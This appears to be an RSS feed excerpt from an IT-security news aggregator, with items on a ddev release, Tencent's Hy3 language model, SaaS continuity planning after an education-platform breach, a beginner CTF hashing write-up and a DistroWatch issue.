<li>fix(router): temp pin for traefik:3.6.13, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4820038987" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8562" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8562/hovercard" href="https://github.com/ddev/ddev/issues/8562">#8562</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4821494411" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8564" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8564/hovercard" href="https://github.com/ddev/ddev/pull/8564">#8564</a></li>
<li>fix(shopware): pin Twig &lt;3.28 to work around admin HTTP 500 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4807420317" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8557" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8557/hovercard" href="https://github.com/ddev/ddev/pull/8557">#8557</a></li>
<li>docs: add TYPO3 special handling for <code>ddev share</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3594892063" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7799" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7799/hovercard" href="https://github.com/ddev/ddev/issues/7799">#7799</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4806999999" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8556" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8556/hovercard" href="https://github.com/ddev/ddev/pull/8556">#8556</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/silverham/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/silverham">@silverham</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355742321" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8368" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8368/hovercard" href="https://github.com/ddev/ddev/pull/8368">#8368</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CallMeLeon167/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CallMeLeon167">@CallMeLeon167</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4375346339" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8384" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8384/hovercard" href="https://github.com/ddev/ddev/pull/8384">#8384</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mikee-3000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mikee-3000">@Mikee-3000</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372014245" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8383" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8383/hovercard" href="https://github.com/ddev/ddev/pull/8383">#8383</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wolcen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wolcen">@wolcen</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4441784873" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8412" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8412/hovercard" href="https://github.com/ddev/ddev/pull/8412">#8412</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chx">@chx</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494536198" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8420" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8420/hovercard" href="https://github.com/ddev/ddev/pull/8420">#8420</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mficzel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mficzel">@mficzel</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733715228" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8522" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8522/hovercard" href="https://github.com/ddev/ddev/pull/8522">#8522</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jonpugh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jonpugh">@jonpugh</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4785496062" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8543" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8543/hovercard" href="https://github.com/ddev/ddev/pull/8543">#8543</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/ddev/ddev/compare/v1.25.2...v1.25.3"><tt>v1.25.2...v1.25.3</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Open Source: Neues Firefox-Add-on umgeht Alterskontrollen - Golem.de]]></title>
<description><![CDATA[... Information Security Professional: virtueller Fünf-Tage-Workshop ... IT Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ...]]></description>
<link>https://tsecurity.de/de/3649676/it-security-nachrichten/open-source-neues-firefox-add-on-umgeht-alterskontrollen-golemde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649676/it-security-nachrichten/open-source-neues-firefox-add-on-umgeht-alterskontrollen-golemde/</guid>
<pubDate>Mon, 06 Jul 2026 21:08:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... Information <b>Security</b> Professional: virtueller Fünf-Tage-Workshop ... <b>IT</b> Sicherheitstests und Ethical Hacking mit Kali Linux (E-Learning). E ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Tencent's Apache-licensed Hy3 takes on GLM-5.2 at half the size — and wins everywhere except coding]]></title>
<description><![CDATA[For the past year, the awkward secret of the open-weight model boom has been that many of the strongest Chinese releases were off-limits to a large slice of the enterprises most interested in them. License terms that excluded the European Union, the United Kingdom and South Korea meant legal team...]]></description>
<link>https://tsecurity.de/de/3649448/it-nachrichten/tencents-apache-licensed-hy3-takes-on-glm-52-at-half-the-size-and-wins-everywhere-except-coding/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649448/it-nachrichten/tencents-apache-licensed-hy3-takes-on-glm-52-at-half-the-size-and-wins-everywhere-except-coding/</guid>
<pubDate>Mon, 06 Jul 2026 19:04:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>For the past year, the awkward secret of the open-weight model boom has been that many of the strongest Chinese releases were off-limits to a large slice of the enterprises most interested in them. License terms that excluded the European Union, the United Kingdom and South Korea meant legal teams killed deployments before engineering teams finished their evals — not just for companies headquartered there, but for any enterprise serving traffic into those regions. For IT teams weighing open models, the trade-offs are unusually explicit.</p><p>Tencent just removed that obstacle. The company's Hunyuan team released the full version of <a href="https://huggingface.co/tencent/Hy3"><b>Hy3</b></a>, a 295-billion-parameter Mixture-of-Experts (MoE) model with 21 billion active parameters, and — in a reversal from April's preview release — shipped it under the permissive <b>Apache 2.0</b> license. The reaction from the open-model community was immediate, with researchers on X singling out the license change as the real headline, and one widely shared post arguing that if the scores hold up, Tencent has just become one of the leaders of open source. Tencent says it will be <a href="https://x.com/TencentHunyuan/status/2074148098876768478?s=20">free on OpenRouter for two weeks</a>. </p><p>The scores are worth scrutinizing — and they don't all point the same direction. But the more interesting story is what Tencent chose to lead with: reliability metrics and deployment economics aimed squarely at production use. </p><h2>From preview to product in ten weeks, shaped by 50 internal teams</h2><p>Hy3's April preview was the first model of Tencent's rebuilt pre-training and reinforcement learning infrastructure, shipped less than three months after the February rebuild. Chief AI Scientist Shunyu Yao framed the early open release as a deliberate move to gather feedback from developers and users before the official version — and Tencent says that's exactly what happened. According to the <a href="https://huggingface.co/tencent/Hy3">model card</a>, the team collected feedback from more than 50 product teams after the late-April preview, fixed issues in task execution and interaction, and scaled up its post-training pipeline.</p><p>The architecture is unchanged: 295B total parameters, 21B active per forward pass via top-8 routing across 192 experts, a 3.8B-parameter multi-token prediction (MTP) layer for speculative decoding, and a 256K context window. What changed is behavior. Tencent's positioning is that the full release significantly outperforms similar-size models and rivals flagship open-source models with two to five times the parameters.</p><p>That "two to five times" framing makes sense for where this model is aimed — and it invites a direct comparison with the current open-weight coding leader, GLM-5.2.</p><h2>Tencent's blind test favors Hy3 over GLM-5.1, but GLM-5.2 still owns coding</h2><p>Tencent's headline evaluation is a blind human study rather than a leaderboard. Arguing that public benchmarks don't tell the full story, the company ran a blind test with 270 experts across disciplines working on real-world workflows, collecting 312 valid comparisons, in which Tencent reports that Hy3 scored 2.67 out of 4 against GLM-5.1's 2.51 — with the clearest advantages in frontend development, CI/CD, and data and storage work.</p><p>The choice of opponent matters. Zhipu AI released <a href="https://z.ai/"><b>GLM-5.2</b></a> in mid-June, and Tencent's own benchmark appendix shows GLM-5.2 ahead of Hy3 across essentially the entire agentic coding suite: SWE-bench Verified (84.2 vs. 78.0), SWE-bench Multilingual (83.0 vs. 75.8), Terminal-Bench 2.1 (81 vs. 71.7) and DeepSWE by a wide margin (46.2 vs. 28.0). The blind test targeted the older model; the newer one keeps the coding crown.</p><p>GLM-5.2's coding lead is less surprising once you consider the sizes are side by side: GLM-5.2 is roughly a 744-billion-parameter MoE with around 40 billion active parameters per token, against Hy3's 295 billion total and 21 billion active. Tencent is fielding a model with less than half the parameters — and nearly half the per-token compute — of the one it trails.</p><p>Hy3's genuine wins sit elsewhere. On agentic search, it posts 84.2 on BrowseComp and 91.0 on DeepSearchQA — ahead of every open model in Tencent's table and competitive with Claude Opus 4.8 and GPT-5.5. It leads the open field on tool orchestration (79.1 on the public MCP-Atlas set), on agent-harness evaluations like ClawEval, and on long-context retrieval (73.4 on AA-LCR). Read together, the appendix suggests a model that is arguably the best open-weight choice for search-and-tool-heavy agent workloads, while conceding repository-scale coding to GLM-5.2.</p><p>One caveat applies to both the wins and the losses: nearly all competitor numbers in Tencent's appendix are marked as coming from Tencent's own test runs. Independent verification, from indices like Artificial Analysis, is still pending as of publication.</p><h2>The reliability pitch: hallucination rates cut in half</h2><p>Where the release gets most interesting for enterprise buyers is the set of numbers Tencent chose to emphasize instead of benchmarks. The model card reads less like a leaderboard announcement and more like a production reliability report.</p><p>In internal evaluations on real-world scenarios, Tencent says Hy3's hallucination rate dropped compared to the preview version from 12.5% to 5.4%, and commonsense error rates fell from 25.4% to 12.7% — improvements it attributes to fine-grained data cleaning and training constraints built around an explicit behavior pattern: answer when grounded, state when evidence is missing, don't conflate sources, don't fabricate data. Multi-turn behavior gets the same treatment: the issue rate on internal multi-turn tests fell from 17.4% to 7.9%, and Tencent reported that the model's score on the open MRCR long-dialogue benchmark jumped from 42.9% to 75.1%.</p><p>Tencent also emphasizes consistency across agent scaffolds — reporting SWE-bench variance within a few points whether the model runs inside Claude Code-style harnesses, Cline or KiloCode. That's an underrated property: enterprises rarely control which agent framework their teams standardize on, and a model that only performs in one harness is a hidden integration cost. These are self-reported internal measurements, and they deserve the same skepticism as any vendor benchmark. But the choice to foreground them at all signals who Tencent believes its customer is: teams that have been burned by models that demo well and fabricate confidently in production.</p><h2>The deployment math: a 295B model in a 744B world — on export-compliant silicon</h2><p>The reliability story connects directly to the economics, and this is where Hy3's coding gap against GLM-5.2 starts to look like a deliberate trade rather than a loss.</p><p>GLM-5.2 is a roughly 744-billion-parameter MoE with about 40 billion active parameters per token; in FP8, its weights alone consume roughly 744GB, making an 8x H200 node the practical minimum for production serving. Hy3, at 295B total parameters, carries an FP8 footprint of under 300GB — less than half the memory, with roughly half the active parameters per token driving lower per-request compute. For an organization deciding what to self-host, that's the difference between one heavily-specced node and something far more attainable, with room left over for KV cache and batching.</p><p>There's a geopolitical wrinkle in the deployment guide worth noticing too: Tencent's recommended serving configuration targets Nvidia’s <b>H20-3e</b> — the memory-boosted variant of the H20, the GPU Nvidia designed specifically to comply with U.S. export restrictions on China. Unlike GLM-5.2, there is no mention of Huawei or Ascend chips here. In other words, the model is sized so that eight of the chips Chinese companies can legally buy comfortably serve it at full precision. That constraint-driven design has a convenient side effect for everyone else: a model that runs well on deliberately capped silicon runs even more comfortably on the H100s, H200s and B200s available in Western data centers, through standard <a href="https://github.com/Tencent-Hunyuan/Hy3-preview">vLLM and SGLang</a> deployments with MTP speculative decoding.</p><p>Add the Apache 2.0 license — no regional exclusions, no field-of-use restrictions — and the enterprise equation becomes clear. GLM-5.2 remains the open-weight choice when coding performance is the only criterion and an 8x H200 budget is available. Hy3 makes its case everywhere else: search and tool-heavy agent workloads, reliability-sensitive applications and organizations that want frontier-adjacent capability without frontier-scale infrastructure. The open question is whether Western enterprises, now that the license barrier is gone, will treat a Tencent model as a serious candidate at all — or whether the next Artificial Analysis update settles the benchmark debate before procurement gets the chance.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Single points of failure fail. The SaaS layer is not an exception]]></title>
<description><![CDATA[Higher education has consolidated its entire academic operation into a handful of massive SaaS platforms. The LMS manages instruction, grading and communication. The SIS owns enrollment, records and financial aid. Identity and productivity live in a small number of cloud providers. These are not ...]]></description>
<link>https://tsecurity.de/de/3648395/it-security-nachrichten/single-points-of-failure-fail-the-saas-layer-is-not-an-exception/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648395/it-security-nachrichten/single-points-of-failure-fail-the-saas-layer-is-not-an-exception/</guid>
<pubDate>Mon, 06 Jul 2026 12:08:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Higher education has consolidated its entire academic operation into a handful of massive SaaS platforms. The LMS manages instruction, grading and communication. The SIS owns enrollment, records and financial aid. Identity and productivity live in a small number of cloud providers. These are not peripheral tools — they are the operational infrastructure of the institution. As IT stewards, we manage platforms we do not own, cannot restore ourselves and cannot directly control — which makes contingency planning not optional, but fundamental to the role.</p>



<p>The contracts are in place. The SLAs are signed. The compliance certifications are current. None of that matters to a student who cannot reach her instructor three days before finals. None of it matters to a faculty member who has no roster, no grade book and no way to document the work his students submitted before the platform went dark. SLAs govern vendor response timelines. Keeping academic operations running during that response window is IT’s responsibility.</p>



<p>The disruption hit during finals week 2026, and I was doing what every CIO in higher education was doing — monitoring. A major learning management system <a href="https://www.csoonline.com/article/4180194/lessons-from-the-canvas-cyberattack.html">had been breached</a>. The disruption spread fast. Finals were canceled. Exams were postponed. Students and staff were stranded without access to coursework, rosters or grade books. The costs — in academic disruption, extended contracts, emergency response — were substantial and widely reported. My institution was not directly impacted. But watching peer institutions in my own state go dark during the highest-stakes moment of the academic calendar was not reassuring. It was a confirmation of something I had been thinking about for a long time.</p>



<p>The disruption proved something IT professionals have relearned in every decade of their careers. Mark Twain observed that history does not repeat itself, but it does rhyme. This is a verse we have heard before: Dependence on a single point of failure, without a tested contingency plan, is not a strategy — it is a risk that has simply not yet been called. Whether the failure comes from a cyberattack, a vendor outage, an infrastructure collapse or a cloud provider’s bad deployment, the result is the same. The institution stops. And no SLA, contract or compliance certification prevents that moment from arriving.</p>



<p>Vigilance is not optional. Technologies are evolving faster than any IT team can fully anticipate. New platforms, new integrations, new dependencies emerge constantly — and with each one comes a new potential failure point. That is not an argument against adopting new technology. It is an argument for the one principle that never becomes obsolete: Reliance on any single critical system, whether it is a connectivity provider, an identity platform or a SaaS solution, is a proven strategy for failure. The question is never whether that system will fail. The question is whether the institution is prepared when it does.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Single points of failure fail — inevitably, and at the worst possible time. IT professionals have known this for thirty years. The SaaS layer is not exempt.</p>
</blockquote>



<p>This is not a new lesson. Azure has gone down. AWS has failed. <a href="https://er.educause.edu/articles/2026/5/how-higher-education-is-responding-to-the-canvas-lms-incident-and-preparing-for-whats-next">Google Workspace has had outages that took organizations dark globally</a>. No campus runs a single ISP connection — we provision redundant circuits, preferably from independent providers, because we learned long ago that the connection will sometimes fail and the institution cannot afford to stop when it does. Financial services, government and multinational enterprises applied that same logic to every dependency in their stack. Their response to platform risk was not to demand better SLAs. It was to architect around the dependency. Redundancy. Failover. Independent continuity capability. The massive disruptions from Canvas demonstrate that effective contingency solutions for these critical platforms have not kept pace with our dependence on them. We cannot get fooled again.</p>



<p>That omission is what made the 2026 attack so damaging. Not the sophistication of the breach — the entry point was a peripheral free-tier environment that wasn’t even within the vendor’s primary certification scope. The damage was catastrophic because institutions had no fallback. Faculty had no rosters. Administrators had no enrollment data. There was no continuity layer. A single point of failure, at institutional scale, with no plan for when it fails.</p>



<p>And now the economics have shifted in the worst possible direction. <a href="https://techcrunch.com/2025/05/08/powerschool-paid-a-hackers-ransom-but-now-schools-say-they-are-being-extorted/">PowerSchool paid a ransom in December 2024</a> after attackers stole data on 60 million students — and was re-extorted anyway, with individual school districts receiving separate demands months later using the same stolen data. <a href="https://www.instructure.com/incident_update">Instructure’s CEO publicly confirmed the extortion payment</a>. Anyone who has paid a ransom only to be hit a second time at double the cost can tell you — paying the attackers resolves nothing and instead invites more attacks. The sector has now proven twice, publicly, and at scale, that it will pay. That changes the threat calculus entirely. Higher education stops being a target of opportunity and becomes a target of strategy. Criminal groups share that intelligence. Banner serves over 1,400 institutions. Blackboard reaches tens of millions of users across thousands of campuses. Every major higher education SaaS platform is now on active threat actor priority lists — not because they are newly vulnerable, but because the sector has proven it will pay, that academic calendar pressure creates maximum leverage, and that IT has not yet built the operational alternative that our dependence on these platforms demands — and therefore the failure is ours to own, especially if we allow it to happen a second time.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>The sector has proven it will pay. Every ransomware group operating today just received the same market signal. What follows is not unpredictable — it is documented, underway and aimed directly at the platforms carrying your institution’s academic operations.</p>
</blockquote>



<p>As a CIO, my approach to this is not a spreadsheet or a stack of printed reports. IT is responsible for identifying critical failure points and countering them — that is not optional; it is the job. Accepting failure as inevitable without a mitigation strategy is not viable. Redundancy and continuity solutions are standard practice everywhere else in our infrastructure. There was no reason the SaaS layer should be different.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>A leader’s first job isn’t to be right — it’s to be responsible.</p>
</blockquote>



<p>The solution I implemented is a secure, read-only, centralized repository — a continuity strategy that ensures students, staff and faculty can continue to function whether the issue is a power outage, a cyberattack or a SaaS platform going dark. It is not a replacement for Canvas or Banner. It is the independent fallback that allows the institution to keep operating while the primary system is restored. I have learned the hard way that accepting failure without a plan is not a posture any CIO can defend.</p>



<p>Watching the frustration across the industry during and after the 2026 attack — institutions paralyzed, peer CIOs improvising, faculty working from personal spreadsheets, boards asking questions no one could answer — the logic of extending this capability to other institutions became unavoidable. The solution is not complex. The architecture is straightforward. The discipline behind it is thirty years old. The discipline is established. The responsibility to apply it is our field of expertise in IT.</p>



<p>To be precise about scope: An ACR does not prevent vendor breaches, replace cyber insurance or remove notification obligations. When an incident hits, legal counsel, security teams and institutional leadership still manage the response. What the ACR changes is what they have to work with — a governed, auditable record of what data was accessed, what manual actions were taken and how operations continued while the vendor worked to restore service.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Redundancy, disaster recovery, continuity of operations — the discipline is not new. The SaaS platforms carrying academic operations deserve the same standard we hold everywhere else.</p>
</blockquote>



<p>The solution to this problem exists. A SaaS third-party continuity of operations strategy requires an independent data layer — one the institution controls, synchronized on a regular scheduled cycle from source systems, and accessible when those systems are not. Platform-agnostic across Canvas, Banner, Blackboard and PowerSchool. Read-only by design. Auditable by requirement. Independent by architecture. That last word is the one that matters — independent of the platforms whose availability you cannot guarantee.</p>



<p>Every CIO in higher education knows what a single point of failure looks like. Every one of us has built around them at every other layer. Servers, networks, data centers — we do not accept the single-point risk, and we do not wait for the failure to motivate the fix. The SaaS layer is not an exception.</p>



<p>The question is not whether your institution will face it. The question is whether you will have a continuity strategy in place when it arrives — or be explaining to your board why you did not.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Leaders don’t rent accountability — they own it outright.</p>
</blockquote>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[RingZeroCTF Coding Challenge 1 [Hash Me If You Can] Writeup]]></title>
<description><![CDATA[Ok so guys this is my first writeup i have been writing on the medium platform of the recent CTF i was practicing on the platform RingZero.In that i selected the coding challenges and decided to do the first challenge.Now the challenge interface looked somehow like this the image attached below.C...]]></description>
<link>https://tsecurity.de/de/3647970/hacking/ringzeroctf-coding-challenge-1-hash-me-if-you-can-writeup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647970/hacking/ringzeroctf-coding-challenge-1-hash-me-if-you-can-writeup/</guid>
<pubDate>Mon, 06 Jul 2026 08:53:06 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<ol><li>Ok so guys this is my first writeup i have been writing on the medium platform of the recent CTF i was practicing on the platform RingZero.</li><li>In that i selected the <strong>coding challenges</strong> and decided to do the first challenge.</li><li>Now the challenge interface looked somehow like this the image attached below.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*R7KN3pVfq5g74sJad0hZhQ.png"><figcaption>Clicked on the ‘Go To Challenge’ Option</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*hmWWFjKegKW1AUIuUCwA0g.png"><figcaption>Challenge URL :- <a href="http://challenges.ringzer0ctf.com:10013/">http://challenges.ringzer0ctf.com:10013/</a></figcaption></figure><p>4. Now after this i read the challenge text carefully and it told that i have to hash this given message text using the SHA 512 Algorithm and then submit the text to the given URL and in the end i will get the flag after i submit the correct response.</p><p>5. <strong>All this process i have to in just 2 seconds, which is obviously not humanly possible at all</strong>.</p><p>6. So here clearly we had to apply the kind of the some script or any commands of linux and send the requests.</p><p>7. <strong>SHA 512</strong> :- It is a cryptographic hashing algorithm which is used to convert any text of the any length in just 512 bit [64 bytes]. It is not any encryption algorithm at all. It is a part of the SHA 2 family in cryptography.</p><p>8. Now the first command i thought of running was :-</p><pre>curl "http://challenges.ringzer0team.com:10013/?r=$(echo -n [The hashing text] | shah512sum | cut -d ' ' -f1)"</pre><p>9. Now in this command i have used the :</p><p>a. curl command to send the HTTP Requests from the CLI Terminal of the Kali.</p><p>b. <strong>echo -n command</strong> to paste the text including the newline character as well.</p><p>c. <strong>sha512sum</strong> for hashing</p><p>d. <strong>cut delimiters of the whitespaces and then extracting only first field of that </strong>.</p><p>10. But here is the thing that this command will not give the flag at all because the <strong>Challenge URL</strong> is dynamic and the texts updates itself. So if we send the requests of curl in just 2 seconds the text will get updated and then new text will be there which will have the different hash then previous one.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*h8faXA9xHvXbEhVqVmuJsQ.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9r85IuR72w9qkpjGa6RILw.png"></figure><p>11. In the images you can clearly see that it has shown in the response that too slow process error.</p><p>12. So i used some help of the AI then got to know about the session stateful requests which <strong>store the cookies</strong> and <strong>session id </strong>automatically and then from that we can send the the requests to the URL and it will store the cookies and in response we will get the answer.</p><p>13. By <strong>storage of the session cookies</strong> we will <strong>retrieve the original message response</strong> of the server which will include the flag.</p><p>14. So now <strong>choosing the Python </strong>as the language because it has the <strong>supported libraries</strong> which will make the scripting easier i constructed the below script.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2GPARBh7t35r4B6SjIogcg.png"><figcaption>Final Python Script</figcaption></figure><p>15. <strong>Explanation of the script in understandable way </strong>:-</p><p>a.<strong> <em>requests, re, hashlib library</em> </strong>:- <em>Requests is the A Python library used to send HTTP requests (GET, POST, etc.) to websites and receive responses like a browser. It handles sessions, cookies, headers, and makes web automation simple and reliable. Re is the Python’s regular expression library used to search, match, and extract patterns from text. It is used when you need to find specific data inside large or messy strings like logs or HTML. Hashlib is the Python’s cryptographic hashing library used to generate hashes like SHA-256 and SHA-512. It converts data into a fixed-length fingerprint used for integrity checks and security tasks</em>.</p><p>b. <em>I used the </em><strong><em>requests library</em></strong><em> of the python to create the session of the website and the extract the response of the text and then i just applied the </em><strong><em>re.search function</em></strong><em> to extract the original message which we are given to hash</em>.</p><p>c. <strong><em>.*?</em></strong><em> -&gt; </em><strong><em>‘.’</em></strong><em> means to match any character. </em><strong><em>‘*’</em></strong><em> means to repeat the process zero or more times. </em><strong><em>‘?’</em></strong><em> makes it lazy to match little as possible.</em></p><p>d. <strong><em>\s*</em></strong><em> -&gt; To neglect the whitespaces in the reponse.</em></p><p>e. <strong><em>strip() function</em></strong><em> :- This is the function of the python to remove the leading and trailing whitespaces from the text we have selected.</em></p><p>f. <strong><em>hashlib.sha512(text.encode()).hexdigest </em></strong><em>:- Now the extracted text is the alphanumeric characters which the machine do not understand, it understands the language of the bit/bytes so we encoded to the UTF-8 encoding [By Default] using the encode() function and then applied the sha512 function and then after that we again converted to hexadecimal characters for the human readable text.</em></p><p>g. <em>At last we added the line of sending requests with the </em><strong><em>params [parameter]</em></strong><em> added as well.</em></p><p>16. <strong>With this we executed the script</strong>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lC-P9SYrBDVesrJZtuqOng.png"><figcaption>Response Part 1</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tALgdIGwiHUGyHm2VlEfYw.png"><figcaption>Response Part 2</figcaption></figure><p>17. <strong>Hell Yeah we got the Flag</strong>.</p><p>18. <strong>One another method is also there of the Burp Suite Using as well. So i suggest all of people to try that method themselves as well</strong>.</p><p>This was my first write-up, and it marks the beginning of a series where I will consistently break down <strong>real CTF challenges with real techniques and real learning outcomes</strong>. My goal is not just to solve challenges, but to <strong>explain the mindset, tooling, and reasoning</strong> behind every step so that readers can actually apply these skills in practice.</p><p>Every upcoming write-up will focus on <strong>practical cybersecurity concepts</strong>, clean automation, and problem-solving approaches that are genuinely useful for CTFs, penetration testing, and real-world security work. If you are someone who wants to move beyond copy-paste solutions and truly understand <em>why</em> things work, these write-ups are for you.</p><p>If you found this helpful, consider following and sharing it with your peers — it helps me stay consistent and motivates me to keep producing <strong>high-quality, beginner-friendly yet technically solid content</strong> for the community.</p><p>More challenges. More automation. More learning.</p><p><strong>Happy Hacking.</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*U7qcpGP5GTpyKsac"><figcaption>Photo by <a href="https://unsplash.com/@csbphotography?utm_source=medium&amp;utm_medium=referral">Conor Samuel</a> on <a href="https://unsplash.com/?utm_source=medium&amp;utm_medium=referral">Unsplash</a></figcaption></figure><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=ba55f820a1b8" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/ringzeroctf-coding-challenge-1-hash-me-if-you-can-writeup-ba55f820a1b8">RingZeroCTF Coding Challenge 1 [Hash Me If You Can] Writeup</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[DistroWatch Weekly, Issue 1180]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  This week in DistroWatch Weekly: 
Review: FreeBSD 15.1 with an install-time desktop
News: Asahi fixes macOS boot bug, reasons to run Gentoo, Ubuntu reverts Rust-based copy command, Astral gets WINE port
Questions and answers: Vario...]]></description>
<link>https://tsecurity.de/de/3647479/unix-server/distrowatch-weekly-issue-1180/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647479/unix-server/distrowatch-weekly-issue-1180/</guid>
<pubDate>Mon, 06 Jul 2026 02:16:22 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  This week in DistroWatch Weekly: <br>
Review: FreeBSD 15.1 with an install-time desktop<br>
